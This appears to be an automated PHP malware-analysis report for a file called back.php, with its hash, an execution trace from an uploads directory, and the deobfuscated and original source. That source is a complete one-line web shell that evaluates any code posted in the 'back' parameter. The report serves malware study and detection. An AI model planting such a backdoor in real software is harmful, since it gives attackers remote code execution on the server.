PHP Malware Analysis

back.php

md5: bdb30c9329681477889945b81583af8c

Jump to:

Screenshot


Attributes

Execution

Input


Deobfuscated PHP code

<?php

@eval($_POST['back']);

Execution traces

data/traces/bdb30c9329681477889945b81583af8c_trace-1676256763.5541.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:53:09.451942]
1	0	1	0.000267	393512
1	3	0	0.000329	393864	{main}	1		/var/www/html/uploads/back.php	0	0
1	3	1	0.000356	393896
			0.000389	314256
TRACE END   [2023-02-13 00:53:09.452108]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php @eval($_POST['back']);?>